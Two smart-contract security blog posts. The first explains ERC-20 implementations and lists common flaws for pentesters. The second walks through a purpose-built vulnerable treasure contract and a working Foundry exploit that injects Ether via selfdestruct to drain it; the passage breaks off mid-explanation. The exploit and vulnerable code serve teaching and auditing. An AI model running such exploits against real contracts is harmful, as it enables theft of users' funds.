    event Approval(address indexed owner, address indexed spender, uint256 value);

    constructor(uint256 initialSupply) {
        totalSupply = initialSupply * (10 ** uint256(decimals));
        balanceOf[msg.sender] = totalSupply;
    }

    function transfer(address to, uint256 amount) public returns (bool) {
        require(to != address(0), &quot;Invalid address&quot;);
        require(balanceOf[msg.sender] &gt;= amount, &quot;Insufficient balance&quot;);

        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;

        emit Transfer(msg.sender, to, amount);
        return true;
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        require(spender != address(0), &quot;Invalid address&quot;);

        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) public returns (bool) {
        require(to != address(0), &quot;Invalid address&quot;);
        require(balanceOf[from] &gt;= amount, &quot;Insufficient balance&quot;);
        require(allowance[from][msg.sender] &gt;= amount, &quot;Allowance exceeded&quot;);

        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        allowance[from][msg.sender] -= amount;

        emit Transfer(from, to, amount);
        return true;
    }
}

```

This contract defines an **ERC-20 token from scratch**, implementing the core functionality needed for transfers, approvals, and ownership tracking. Let’s break it down at a high level.

The contract starts by defining the **token’s basic properties**, including its name (`DesertCoin`), symbol (`DSC`), and number of decimal places (`18`), which is the standard for most ERC-20 tokens. The `totalSupply` variable keeps track of the total amount of tokens that exist.

Each **Ethereum address has a balance**, stored in the `balanceOf` mapping. Another mapping, `allowance`, is used to track approvals—this allows users to grant permission to others to spend tokens on their behalf.

When the contract is deployed, the **constructor** initializes the token by minting the entire supply to the deployer&apos;s address. The initial supply is multiplied by `10^18` to adjust for the decimals, ensuring that token values are represented correctly.

The `transfer()` function enables users to **send tokens to another address**. It first checks that the sender has enough tokens and that the recipient address is valid. If these conditions are met, it deducts the amount from the sender’s balance and adds it to the recipient’s. It then emits a `Transfer` event, which external applications (like wallets and block explorers) can use to track token movements.

The `approve()` function allows a user to **authorize another address to spend a certain amount of tokens on their behalf**. This is useful for interactions with smart contracts, such as decentralized exchanges (DEXs), where users don’t send tokens directly but instead approve a contract to manage them. When an approval is made, an `Approval` event is emitted.

The `transferFrom()` function is used when a third party (such as a smart contract) **moves tokens on behalf of someone else**. It checks if the sender has enough balance and if the transaction respects the approved allowance. If valid, it performs the transfer and updates the allowance accordingly.

# Using OpenZeppelin for a More Secure ERC-20 Contract

In the previous example, we built our ERC-20 contract **from scratch**, implementing all the core functionalities manually. This was done to better understand how ERC-20 tokens work under the hood. However, in real-world development, most developers **don’t reinvent the wheel**—instead, they use battle-tested libraries like **OpenZeppelin**.

OpenZeppelin provides well-audited, secure, and gas-optimized implementations of common smart contract standards, including ERC-20. By leveraging these libraries, we reduce the risk of introducing vulnerabilities and simplify development.

Additionally, one function that is commonly used in ERC-20 tokens but was not present in our previous **DesertCoin** implementation is `mint()`. This function allows for new token issuance after deployment, making it useful for **inflationary tokens, reward-based systems, or governance models** where new tokens may need to be introduced over time.

Let’s see how our **DesertCoin** contract would look when using OpenZeppelin.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;@openzeppelin/contracts/token/ERC20/ERC20.sol&quot;;
import &quot;@openzeppelin/contracts/access/Ownable.sol&quot;;

contract DesertCoin is ERC20, Ownable {
    constructor(uint256 initialSupply) ERC20(&quot;DesertCoin&quot;, &quot;DSC&quot;) Ownable(msg.sender) {
        _mint(msg.sender, initialSupply * (10 ** decimals()));
    }
     function mint(address to, uint256 amount) public onlyOwner {
        _mint(to, amount);
    }

}

```

This implementation significantly reduces complexity by leveraging OpenZeppelin’s secure ERC-20 contract. Instead of manually writing the transfer, balance tracking, and approval logic, we **inherit** from the `ERC20` contract, which already provides all the required ERC-20 functionality.

The constructor initializes the token with a name (&quot;DesertCoin&quot;) and a symbol (&quot;DSC&quot;). It then calls `_mint()` to allocate the initial token supply to the deployer’s address. This means that upon deployment, all tokens will be assigned to the person who created the contract.

A key addition in this version is the `mint()` function. This function allows new tokens to be issued after deployment, but it is restricted by the `onlyOwner` modifier, which ensures that only the contract owner (the deployer by default) has the authority to mint more tokens. This prevents unauthorized inflation and maintains controlled token issuance.

By using OpenZeppelin’s `Ownable` contract, we also gain access to ownership management functions. This means the deployer can later transfer ownership to another address if needed, which is particularly useful for projects that might transition control to a DAO or governance contract.

# **Common ERC-20 Vulnerabilities: What to Watch for as a Pentester**

When pentesting ERC-20 tokens, it&apos;s essential to go beyond simple functional tests and actively look for **exploitable flaws**. While the ERC-20 standard is well-defined, implementation mistakes—or even design choices—can introduce **critical vulnerabilities** that lead to **theft, token manipulation, or denial-of-service (DoS) attacks**.

Below are some of the **most common and interesting ERC-20 vulnerabilities** that should be in every pentester’s checklist.

### 1️⃣ **Integer Overflows and Underflows: Breaking Balances**

Integer arithmetic bugs were one of the earliest attack vectors on Solidity smart contracts. Before **Solidity 0.8**, integer overflows and underflows could be used to **manipulate balances or supply calculations**, leading to fund mismanagement or even infinite tokens.

💥 **Attack Scenario:**  
If subtraction is performed **without proper checks**, a pentester can force an **underflow**, tricking the contract into **giving them a massive balance** due to Solidity’s wrap-around behavior (in older versions).

&lt;details&gt;
&lt;summary&gt;Example of a vulnerable implementation:&lt;/summary&gt;

```solidity
function transfer(address to, uint256 amount) public {
    balanceOf[msg.sender] -= amount; // Underflows if amount &gt; balance
    balanceOf[to] += amount;         // Overflows if amount is extremely large
}

```
&lt;/details&gt;


🔍 **Pentester’s checklist:**

-   Does the contract run on an older Solidity version (&lt;0.8)?
-   Does it manually handle arithmetic (`+`, `-`, `*`, `/`) instead of using **SafeMath** or Solidity’s built-in overflow protection?
-   Can we force an underflow by transferring **more tokens than we own**?

✅ **Solution:** Solidity 0.8+ **automatically reverts on overflows**, but older versions require `SafeMath` to prevent this issue.

📖 **Want to see an exploit in action?** Check [Chapter 8](https://www.kayssel.com/post/web3-8/), where we analyze past attacks using integer overflows and test modern defenses.

### **Approval Race Condition (`approve()` and `transferFrom()`)**

One of the most **dangerous** design flaws in ERC-20 is the **race condition in `approve()`**. If a user wants to update an approval, a **malicious spender can front-run the transaction** and steal funds before the new approval is set.

💥 **Attack Scenario:**

1.  Alice approves Bob to spend `100` tokens.
2.  Alice wants to lower Bob’s allowance to `50`, so she submits a transaction.
3.  Bob, monitoring the mempool, **front-runs the transaction** and quickly spends the `100` before the new approval takes effect.
4.  Once Alice’s update is processed, Bob **still has access to the new `50` tokens**.

🔍 **Pentester’s checklist:**

-   Can we front-run an approval transaction?
-   Does the contract use **OpenZeppelin’s `increaseAllowance()` and `decreaseAllowance()`** instead of `approve()`?
-   Can we create a bot to **monitor and exploit approve calls in real-time**?

**Potential Fix:**  
A safer approach is to first set the allowance to `0`, then update it:

```solidity
function safeApprove(address spender, uint256 amount) public {
    require(allowance[msg.sender][spender] == 0, &quot;Must reset allowance first&quot;);
    allowance[msg.sender][spender] = amount;
}

```

Alternatively, using **OpenZeppelin’s `increaseAllowance()` and `decreaseAllowance()`** is recommended.

### **Reentrancy Attacks: Draining the Contract**

If an ERC-20 token **interacts with external contracts** (e.g., in `transferFrom()` or a staking mechanism), **reentrancy vulnerabilities** can allow an attacker to **withdraw more tokens than they should be able to**.

💥 **Attack Scenario:**

-   The contract sends tokens to an **attacker-controlled contract**.
-   The attacker’s contract **re-enters** before the balance update is completed, forcing a second withdrawal.
-   The attacker loops the exploit until the contract is drained.

&lt;details&gt;
&lt;summary&gt;Example of a vulnerable implementation:&lt;/summary&gt;

```solidity
function transferFrom(address from, address to, uint256 amount) public {
    require(balanceOf[from] &gt;= amount, &quot;Not enough balance&quot;);
    require(allowance[from][msg.sender] &gt;= amount, &quot;Not allowed&quot;);

    balanceOf[from] -= amount;
    balanceOf[to] += amount;
    
    (bool success, ) = to.call(&quot;&quot;); // Allows reentrancy if &apos;to&apos; is a contract.
    require(success, &quot;Transfer failed&quot;);
}

```
&lt;/details&gt;


**Pentester’s checklist:**

-   Does the contract make **external calls before updating balances**?
-   Can we create a **reentrant contract** that exploits this behavior?
-   Does the contract **lack reentrancy guards** like `ReentrancyGuard` or **modifiers preventing multiple executions**?

✅ **Solution:** Use the **Checks-Effects-Interactions pattern**, updating balances **before** interacting with external contracts.

📖 **Want to execute a reentrancy attack?** In [**Chapter 4**](https://www.kayssel.com/post/web3-4/), we build an exploit contract and drain it using a **recursive attack function**.

### **Minting Without Limits (Infinite Token Generation)**

ERC-20 tokens that **allow minting** need **strict controls**. If minting is unrestricted, **anyone could create unlimited tokens**, leading to **instant hyperinflation**.

💥 **Attack Scenario:**  
If `_mint()` is exposed without proper access control, a pentester could **generate infinite tokens** and sell them on an exchange before the exploit is patched.

❌ **Vulnerable implementation:**

```solidity
function mint(address to, uint256 amount) public {
    _mint(to, amount);
}

```

**Pentester’s checklist:**

-   Who has access to `_mint()`? Can **anyone call it**?
-   Is there a **max supply limit** enforced?
-   Can we execute **multiple mint calls** and sell the inflated tokens before detection?

✅ **Fix:** Restrict minting to the **contract owner or a specific role**:

```solidity
function mint(address to, uint256 amount) public onlyOwner {
    _mint(to, amount);
}

```

### **Burning Mechanisms That Can Break Tokenomics**

Some ERC-20 tokens allow **burning tokens** (removing them from supply). However, improperly implemented burn functions can introduce unexpected consequences.

**Example of a dangerous `burn()` function:**

```solidity
function burn(uint256 amount) public {
    balanceOf[msg.sender] -= amount;
    totalSupply -= amount;
}

```

If a user accidentally sets their balance to `0` by burning everything, they may not be able to interact with contracts that check `balanceOf() &gt; 0` for validation.

✅ **Fix:** Ensure that burning does not cause unintended consequences in dApps relying on token balance conditions.

### **Blacklisting / Centralization Risks**

Some tokens have **blacklist functions**, allowing an admin to freeze accounts. While useful for regulation compliance, **this can be abused** if one entity has too much control.

-   Can the owner arbitrarily freeze/unfreeze accounts?
-   Can token transfers be blocked suddenly?
-   Are there admin privileges that could be exploited?

If centralization is **too extreme**, it may defeat the purpose of being on-chain.

### **Gas Optimizations**

Some ERC-20 implementations use **loops in storage mappings**, which can **cause excessive gas costs** and even break transactions if the loop grows too large.

```solidity
function batchTransfer(address[] memory recipients, uint256 amount) public {
    for (uint256 i = 0; i &lt; recipients.length; i++) {
        transfer(recipients[i], amount);
    }
}

```

If `recipients` is too large, **the transaction could run out of gas and revert**.

✅ **Fix:** Avoid unbounded loops over dynamic arrays inside transactions.

### **Front-Running Attacks: Extracting Value from Transactions**

If an ERC-20 token interacts with **DEXs, AMMs, or pricing oracles**, it may be **vulnerable to front-running attacks**. These exploits occur when **attackers monitor pending transactions** and submit their own transactions **with a higher gas fee**, getting their trade executed first.

💥 **Attack Scenario:**  
A pentester spots a **large token swap in the mempool**, front-runs it by purchasing the token first, and then sells it back **at a higher price** due to the manipulated price impact.

🔍 **Pentester’s checklist:**

-   Are token swaps **executed deterministically**, making them predictable?
-   Can we front-run high-value transactions **on Uniswap or SushiSwap**?
-   Is the contract vulnerable to **Maximum Extractable Value (MEV) bots**?

📖 **Want to profit off front-running?** In [**Chapter 5**](https://www.kayssel.com/post/web3-5/), we build a **custom Flashbots bot** that detects ERC-20 price movements and executes MEV attacks on DeFi protocols.

# **Conclusions**

ERC-20 tokens may seem simple at first glance, but as we’ve seen, **their implementation can be full of hidden pitfalls**. From **integer overflows** and **approval race conditions** to **front-running exploits** and **reentrancy attacks**, even a small mistake in a contract’s logic can lead to **severe financial losses** or complete contract failure.

For pentesters, ERC-20 tokens present **a highly rewarding attack surface**. The sheer number of tokens deployed on Ethereum means there’s no shortage of **vulnerable implementations** waiting to be tested. And while standards like **OpenZeppelin** provide secure boilerplate implementations, **many projects still write custom logic**—often introducing new attack vectors in the process.

The key takeaways from this article are:  
✅ **Always check integer operations**—older contracts may still be vulnerable to overflows and underflows.  
✅ **Race conditions in approvals can lead to stolen funds**—use `increaseAllowance()` and `decreaseAllowance()` instead of `approve()`.  
✅ **Reentrancy isn’t just a DeFi problem**—even ERC-20 tokens can fall victim to recursive attacks.  
✅ **Unrestricted minting is a disaster waiting to happen**—check who has access to `_mint()` and whether a token has an enforced max supply.  
✅ **Front-running attacks are real**—especially in DeFi integrations where price-sensitive transactions can be manipulated.

From an offensive security standpoint, **fuzzing, unit tests, and manual review are critical tools** for discovering these flaws before attackers do. Tools like **Foundry** allow pentesters to simulate attacks, automate vulnerability discovery, and understand **how a contract behaves under stress**.

If you’re an auditor, developer, or someone looking to get into **smart contract security**, ERC-20 is an excellent starting point. The vulnerabilities here **apply to a wide range of Solidity contracts**, and understanding them will give you **a strong foundation for analyzing more complex protocols**.

# References

-   Ethereum Improvement Proposals. &quot;EIP-20: ERC-20 Token Standard.&quot; Available at: https://eips.ethereum.org/EIPS/eip-20
-   OpenZeppelin Documentation. &quot;ERC20: Standard Token Implementation.&quot; Available at: https://docs.openzeppelin.com/contracts/4.x/api/token/erc20
-   Solidity Documentation. &quot;Solidity 0.8.x Breaking Changes.&quot; Available at: https://docs.soliditylang.org/en/latest/080-breaking-changes.html
-   Solidity Documentation. &quot;SafeMath: Avoiding Integer Overflows and Underflows.&quot; Available at: https://docs.soliditylang.org/en/latest/security-considerations.html#integer-overflow-and-underflow
-   OpenZeppelin Blog. &quot;Understanding Reentrancy Attacks in Smart Contracts.&quot; Available at: https://blog.openzeppelin.com/reentrancy-after-istanbul/
-   Ethereum Improvement Proposals. &quot;EIP-2771: Secure Meta-Transactions.&quot; Available at: https://eips.ethereum.org/EIPS/eip-2771
-   OpenZeppelin Documentation. &quot;Preventing Reentrancy Attacks with ReentrancyGuard.&quot; Available at: https://docs.openzeppelin.com/contracts/4.x/api/security#ReentrancyGuard
-   OpenZeppelin Documentation. &quot;Using Ownable to Secure Smart Contract Ownership.&quot; Available at: https://docs.openzeppelin.com/contracts/4.x/api/access#Ownable</content:encoded><author>Ruben Santos</author></item><item><title>selfdestruct Unleashed: How to Hack Smart Contracts and Fix Them</title><link>https://www.kayssel.com/post/web3-13</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-13</guid><description>Explore how Ethereum’s powerful selfdestruct function can be exploited to bypass deposit restrictions and drain smart contract funds. This guide breaks down a real-world attack, explains the vulnerability, and provides actionable steps to secure contracts against similar exploits.</description><pubDate>Sun, 16 Feb 2025 10:45:38 GMT</pubDate><content:encoded># **Introduction**

In the world of smart contracts, every line of code has the potential to be the hero of a secure transaction—or the villain of a catastrophic exploit. Today, we’re diving into the fascinating, dangerous world of Ethereum exploits by uncovering how a seemingly innocent vulnerability can lead to **completely draining a contract’s balance** using nothing more than a **small deposit** and a **big brain.** 😎

Think of a treasure chest guarded by layers of traps and locks, with adventurers lining up to deposit their gold. It seems foolproof, right? But what if someone had a magic key—an overlooked loophole—that lets them bypass all that security and walk away with the treasure?

That’s exactly what we’re exploring today. We’ll show you how an attacker can use the **`selfdestruct`** mechanism to bypass a deposit limit and trick a vulnerable smart contract into giving them **all its funds.** And the best part? We’ll take you through the full journey: understanding the contract, identifying the flaw, building the exploit, and ultimately securing it to prevent future attacks.

In this adventure, you’ll see how **GrimoireOfDestruction**, a seemingly small helper contract, can cause a **big problem**. But don’t worry—by the end, you’ll also know how to stop it.

So, gear up and let’s dive into the **good, the bad, and the fixable** in smart contract security. Ready to steal (or protect) the treasure? Let’s go. 🏴‍☠️✨

# **The Power (and Danger) of `selfdestruct` in Smart Contracts**

Let’s talk about a powerful tool in the Ethereum world: the **`selfdestruct`** function. Think of it as a &quot;nuclear button&quot; that can permanently destroy a smart contract and send its remaining Ether to a specified address. But, like any dangerous tool, when misused—or even overlooked—it becomes a goldmine for attackers and a major point of interest for pentesters.

Originally, **`selfdestruct`** had two main effects:

1.  **Code wipeout:** The contract’s bytecode and storage were permanently deleted from the blockchain.
2.  **Ether transfer:** Any Ether held in the contract was transferred to the address specified during the call.

This made it a convenient way for developers to clean up unused contracts or implement emergency shutdowns. But it also opened the door for creative attackers. Why? Because developers often assume that Ether can only enter their contracts through controlled functions like `deposit()`. This assumption becomes fatal when **`selfdestruct`** allows Ether to be sent **directly** to the contract, bypassing all internal checks.

Imagine this: You’re testing a staking contract where rewards are calculated based on the total Ether balance. The developers built strict controls, assuming only their `deposit()` function could add funds. But as a clever pentester, you deploy a small &quot;helper&quot; contract, call **`selfdestruct(addressOfStakingContract)`**, and boom—instant Ether injection. The contract’s balance is inflated, the reward calculations are thrown off, and you can potentially withdraw unearned rewards.

To complicate things further, Ethereum’s **Cancun hard fork (EIP-6780)** changed how **`selfdestruct`** works. While the opcode still transfers Ether to the target address, it no longer deletes the contract’s code and storage unless the contract was created and destroyed within the same transaction. This change addresses some exploitation scenarios, but not all. Contracts that rely on their Ether balance without validating the source of the funds are still vulnerable.

So, why should you, as a pentester, care? Because **many contracts still don’t handle &quot;unexpected&quot; Ether correctly.** If a contract assumes its balance reflects only controlled deposits, you can often disrupt its logic by injecting funds directly via **`selfdestruct`**. This opens the door to all sorts of exploits, from manipulating staking rewards to bypassing access controls.

In the next section, we’ll dive into a simple yet vulnerable smart contract example, showing you how **`selfdestruct`** can be exploited to bypass restrictions and gain unintended rewards. Grab your tools—this is where it gets fun. 🔍👾

# **Breaking Down the `CrystalTowerTreasure` Contract: What Does It Do?**

Let’s take a step back and walk through how the **CrystalTowerTreasure** contract works. This smart contract is designed to act as a magical treasure chest where adventurers can deposit their &quot;gold&quot; (Ether) and later claim it along with potential rewards. The contract has a few key mechanics, and understanding them is crucial before we dive deeper into testing its security.

&lt;details&gt;
&lt;summary&gt;Vulnerable smart contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import &quot;forge-std/console.sol&quot;;

contract CrystalTowerTreasure {
    address public owner;
    
    struct Adventurer {
        uint256 deposit;  // Magical gold deposited by the adventurer
        bool hasWithdrawn; // Whether they have already withdrawn their reward
    }

    mapping(address =&gt; Adventurer) public adventurers; // Record of adventurers
    uint256 public totalDeposits; // Total gold deposited in the treasure

    constructor() {
        owner = msg.sender;
    }

    // Adventurers deposit magical gold into the treasure
    function depositGold() public payable {
        require(msg.value &gt; 0, &quot;You must deposit a positive amount of gold.&quot;);
        require(!adventurers[msg.sender].hasWithdrawn, &quot;You already withdrew your rewards.&quot;);

        uint256 check_deposit = adventurers[msg.sender].deposit + msg.value;

        // If the sender is not the owner, enforce the 0.02 ETH limit
        if (msg.sender != owner) {
            require(check_deposit &lt;= 0.02 ether, &quot;You can&apos;t deposit more than 0.02 ETH.&quot;);
        }

        console.log(&quot;User %s deposited %s ETH&quot;, msg.sender, msg.value / 1 ether);
        
        // Record the adventurer&apos;s deposit
        adventurers[msg.sender].deposit += msg.value;
        totalDeposits += msg.value;

        console.log(&quot;Total deposits for user %s is now %s ETH&quot;, msg.sender, adventurers[msg.sender].deposit / 1 ether);
        console.log(&quot;Total deposits in contract: %s ETH&quot;, totalDeposits / 1 ether);
    }

    // Withdraw the deposited gold or the entire balance if it exceeds 15 ETH
    function claimTreasure() public {
        Adventurer storage adventurer = adventurers[msg.sender];
        require(adventurer.deposit &gt; 0, &quot;You have no gold in the treasure.&quot;);
        require(!adventurer.hasWithdrawn, &quot;You already withdrew your rewards.&quot;);

        // Get the current contract balance
        uint256 contractBalance = address(this).balance;
        uint256 amountToTransfer;

        if (contractBalance &gt; 15 ether) {
            // Transfer the entire contract balance
            amountToTransfer = contractBalance;
        } else {
            // Transfer only the user&apos;s deposit
            amountToTransfer = adventurer.deposit;
        }

        // Mark as withdrawn and update the total deposits
        adventurer.hasWithdrawn = true;
        totalDeposits -= adventurer.deposit;

        // Transfer the gold
        payable(msg.sender).transfer(amountToTransfer);
    }
}


```
&lt;/details&gt;


Here’s a detailed breakdown of the main components and functions:

## 📜 **1\. Key Variables**

```solidity
address public owner;
mapping(address =&gt; Adventurer) public adventurers;
uint256 public totalDeposits;

```

-   **`owner`**: The address of the contract’s owner, which is set when the contract is deployed. The owner is special and can deposit more Ether than normal users.
-   **`adventurers`**: A mapping that stores details for each adventurer, tracking how much they’ve deposited and whether they’ve already withdrawn their treasure.
-   **`totalDeposits`**: The total amount of Ether deposited into the contract through legitimate deposits.

These variables help the contract track deposits and withdrawals for each adventurer while keeping an overall record of total deposits.

## 🏛 **2\. Struct: Adventurer**

```solidity
struct Adventurer {
    uint256 deposit;
    bool hasWithdrawn;
}

```

The **`Adventurer`** struct stores two key pieces of information:

-   **`deposit`**: The amount of Ether deposited by the adventurer.
-   **`hasWithdrawn`**: A flag indicating whether the adventurer has already withdrawn their rewards. This helps prevent double withdrawals.

## 💰 **3\. Constructor: Setting Up the Contract**

```solidity
constructor() {
    owner = msg.sender;
}

```

When the contract is deployed, the address that deploys it becomes the **owner**. This owner has special privileges—specifically, they’re allowed to deposit more than 0.02 ETH, unlike regular users.

## 📥 **4\. `depositGold()`: How Adventurers Deposit Ether**

```solidity
function depositGold() public payable {
    require(msg.value &gt; 0, &quot;You must deposit a positive amount of gold.&quot;);
    require(!adventurers[msg.sender].hasWithdrawn, &quot;You already withdrew your rewards.&quot;);

    uint256 check_deposit = adventurers[msg.sender].deposit + msg.value;

    if (msg.sender != owner) {
        require(check_deposit &lt;= 0.02 ether, &quot;You can&apos;t deposit more than 0.02 ETH.&quot;);
    }

    adventurers[msg.sender].deposit += msg.value;
    totalDeposits += msg.value;
}

```

This function handles deposits from users and ensures that certain conditions are met before accepting the Ether:

-   Users must deposit a positive amount of Ether.
-   Users who have already withdrawn their treasure cannot deposit again.
-   **Non-owners** can only deposit up to 0.02 ETH in total. This limit prevents users from depositing large amounts and ensures fairness among adventurers. The owner, however, is allowed to bypass this restriction.

When the deposit is successful:

-   The **`deposit`** amount for the user is updated.
-   The **`totalDeposits`** variable is incremented.

The contract logs the details of each deposit, providing useful feedback for developers or anyone monitoring the contract.

## 🏆 **5\. `claimTreasure()`: How Adventurers Withdraw Ether**

```solidity
function claimTreasure() public {
    Adventurer storage adventurer = adventurers[msg.sender];
    require(adventurer.deposit &gt; 0, &quot;You have no gold in the treasure.&quot;);
    require(!adventurer.hasWithdrawn, &quot;You already withdrew your rewards.&quot;);

    uint256 contractBalance = address(this).balance;
    uint256 amountToTransfer;

    if (contractBalance &gt; 15 ether) {
        amountToTransfer = contractBalance;
    } else {
        amountToTransfer = adventurer.deposit;
    }

    adventurer.hasWithdrawn = true;
    totalDeposits -= adventurer.deposit;

    payable(msg.sender).transfer(amountToTransfer);
}

```

This function allows users to withdraw their deposits or potentially claim the entire contract balance under certain conditions. Here’s how it works:

1.  The contract checks that the user has a valid deposit and hasn’t already withdrawn their treasure.
2.  It calculates how much Ether to transfer:
    -   If the contract’s balance is greater than 15 ETH, the user is entitled to withdraw the **entire balance** of the contract.
    -   Otherwise, the user can only withdraw the amount they originally deposited.
3.  The withdrawal is marked as complete, and the **`totalDeposits`** variable is updated.
4.  The Ether is transferred to the user using **`payable(msg.sender).transfer(amountToTransfer)`**.

## ⚙️ **How Does It All Fit Together?**

-   Adventurers (users) deposit Ether into the contract using **`depositGold()`**, and their deposits are tracked internally.
-   The contract enforces deposit limits for regular users (0.02 ETH) but allows the owner to deposit more.
-   When users call **`claimTreasure()`**, they can withdraw their deposit or potentially the entire contract balance if certain conditions are met.

# **The Exploit: How to Steal All the Ether from `CrystalTowerTreasure`**

It’s time to unleash the attack. Our goal is simple but ambitious: **bypass the restriction that only allows us to deposit 0.02 ETH and drain the contract’s entire balance.** How do we achieve this? By exploiting the fact that the contract blindly trusts its Ether balance without verifying the source of those funds. But before we jump into the exploit, let’s first deploy the vulnerable contract using the deployment script below.

## **Deployment Script**

This script initializes the **CrystalTowerTreasure** contract and deposits 10 ETH on behalf of the owner. The funds we deposit here will later be at risk once the exploit is executed.

```solidity
pragma solidity 0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/CrystalTowerTreasure.sol&quot;;

contract Deploy is Script {
   function run() external {
       vm.startBroadcast(vm.envUint(&quot;PRIVATE_KEY&quot;));
       
       // Deploy the vulnerable CrystalTowerTreasure contract
       CrystalTowerTreasure tower = new CrystalTowerTreasure();
       
       // Log the deployment address
       console.log(&quot;TreasureChest deployed at:&quot;, address(tower));
       
       // Initial deposit of 10 ETH from the contract owner
       tower.depositGold{value: 10 ether}();
       
       vm.stopBroadcast();
   }
}

```

![](/content/images/2025/02/image-1.png)

Deploy Script

With the contract deployed and 10 ETH sitting in its treasure chest, the stage is set for our exploit. In the next section, we’ll walk you through how to deploy another contract, **GrimoireOfDestruction**, inject 5 ETH using `selfdestruct`, and trick the contract into handing over its entire balance. Ready to break in? Let’s go. 🏴‍☠️💸

## **The Attack Plan**

We’ll take advantage of a helper contract, the **GrimoireOfDestruction**, to send Ether directly into the vulnerable **CrystalTowerTreasure** contract using **`selfdestruct`**. By doing this, we bypass the normal deposit mechanism and inflate the contract’s balance, tricking it into giving us everything it has when we call **`claimTreasure()`**.

Here’s the overview of what we’ll do:

1.  **Deploy the `GrimoireOfDestruction` contract** and send it 5 ETH.
2.  **Use `selfdestruct` to transfer the 5 ETH directly into the `CrystalTowerTreasure`** contract, bypassing its deposit checks.
3.  **Make a small, legitimate deposit of 0.01 ETH** through the normal deposit function to ensure we’re registered as an adventurer.
4.  **Call `claimTreasure()` to drain the entire balance of the contract**, exploiting the fact that it trusts the total balance instead of only registered deposits.

```mermaid
sequenceDiagram
    participant Attacker
    participant GrimoireOfDestruction
    participant CrystalTowerTreasure

    Attacker-&gt;&gt;GrimoireOfDestruction: Deploy contract with 5 ETH
    GrimoireOfDestruction-&gt;&gt;CrystalTowerTreasure: selfdestruct() sends 5 ETH directly
    CrystalTowerTreasure--&gt;CrystalTowerTreasure: Balance updated (5 ETH added)

    Attacker-&gt;&gt;CrystalTowerTreasure: Legitimate deposit of 0.01 ETH
    CrystalTowerTreasure-&gt;&gt;CrystalTowerTreasure: Register adventurer and update total deposits

    Attacker-&gt;&gt;CrystalTowerTreasure: Call claimTreasure()
    CrystalTowerTreasure-&gt;&gt;Attacker: Transfer full contract balance (including injected 5 ETH)
    Attacker-&gt;&gt;Attacker: Successfully drain the entire balance

```

Let’s dive into the attack code to see how it works in detail.

## **Exploit Contract**

Let’s take a detailed walkthrough of the exploit script to understand how it bypasses the 0.02 ETH limit and drains the vulnerable **CrystalTowerTreasure** contract.

```solidity
pragma solidity 0.8.0;

import &quot;forge-std/Script.sol&quot;;
import &quot;../src/Payload.sol&quot;;  // The GrimoireOfDestruction contract
import &quot;../src/CrystalTowerTreasure.sol&quot;;  // The vulnerable contract

contract Exploit is Script {
    function run() external {
        vm.startBroadcast(vm.envUint(&quot;ATTACKER_PK&quot;));  // Start transaction as attacker
        CrystalTowerTreasure tower = CrystalTowerTreasure(0x5FbDB2315678afecb367f032d93F642f64180aa3);
        address attacker = vm.envAddress(&quot;ATTACKER_ADDR&quot;);

        console.log(&quot;Attack balance at start: &quot;, attacker.balance);

        // Step 1: Deploy the GrimoireOfDestruction contract with 5 ETH
        GrimoireOfDestruction grimoire = new GrimoireOfDestruction{value: 5 ether}();
        console.log(&quot;GrimoireOfDestruction deployed at: &quot;, address(grimoire));
        console.log(&quot;Balance: &quot;, address(grimoire).balance);

        // Step 2: Execute selfdestruct to transfer 5 ETH directly into the treasure contract
        grimoire.castDestructionSpell(payable(address(tower)));

        // Step 3: Legitimate deposit of 0.01 ETH to be registered as an adventurer
        tower.depositGold{value: 0.01 ether}();
        console.log(&quot;Balance of tower: &quot;, address(tower).balance / 1 ether);

        // Step 4: Call claimTreasure to drain the contract&apos;s entire balance
        tower.claimTreasure();

        console.log(&quot;Attack finished balance: &quot;, attacker.balance / 1 ether);
        vm.stopBroadcast();  // End transaction
    }
}

```

### **Starting the Exploit**

```solidity
vm.startBroadcast(vm.envUint(&quot;ATTACKER_PK&quot;));
CrystalTowerTreasure tower = CrystalTowerTreasure(0x5FbDB2315678afecb367f032d93F642f64180aa3);
address attacker = vm.envAddress(&quot;ATTACKER_ADDR&quot;);

console.log(&quot;Attack balance at start: &quot;, attacker.balance);


```

We begin by:

-   Starting the transaction as the attacker using their private key (`ATTACKER_PK`).
-   Setting up a reference to the **CrystalTowerTreasure** contract at its deployed address.
-   Fetching the attacker’s address and logging their starting balance.

This initial setup ensures that we have everything we need to interact with the vulnerable contract and carry out the attack.

### **Deploying the Grimoire of Destruction**

```solidity
GrimoireOfDestruction grimoire = new GrimoireOfDestruction{value: 5 ether}();
console.log(&quot;GrimoireOfDestruction deployed at: &quot;, address(grimoire));
console.log(&quot;Balance: &quot;, address(grimoire).balance);

```

Next, we deploy the **GrimoireOfDestruction** contract and send it 5 ETH during deployment. This contract is the key to bypassing the 0.02 ETH deposit restriction using **`selfdestruct`**.

-   The 5 ETH we send during deployment will later be transferred directly into the **CrystalTowerTreasure** contract.
-   We log the address of the **GrimoireOfDestruction** contract and its initial balance.

### **Executing `selfdestruct` to Inject 5 ETH**

```solidity
grimoire.castDestructionSpell(payable(address(tower)));

```

Here’s where the magic happens:

-   We call the **`castDestructionSpell()`** function, which triggers the **`selfdestruct`** opcode.
-   The **`selfdestruct`** function transfers the entire balance (5 ETH) of the **GrimoireOfDestruction** contract directly into the **CrystalTowerTreasure** contract.
-   **Why does this work?** Because **`selfdestruct`** bypasses all checks in the **`depositGold()`** function, inflating the contract’s balance without incrementing its internal deposit tracking variables.

At this point, the **CrystalTowerTreasure** contract’s balance reflects the additional 5 ETH, but it doesn’t know where this Ether came from. This is the core of the exploit.

### **Making a Legitimate Deposit of 0.01 ETH**

```solidity
tower.depositGold{value: 0.01 ether}();
console.log(&quot;Balance of tower: &quot;, address(tower).balance / 1 ether);

```

To trigger the **`claimTreasure()`** function, we need to be registered as an adventurer. To do this, we make a legitimate deposit of 0.01 ETH using the **`depositGold()`** function.

-   This small deposit ensures that our address is added to the **adventurers** mapping, making us eligible to claim rewards.
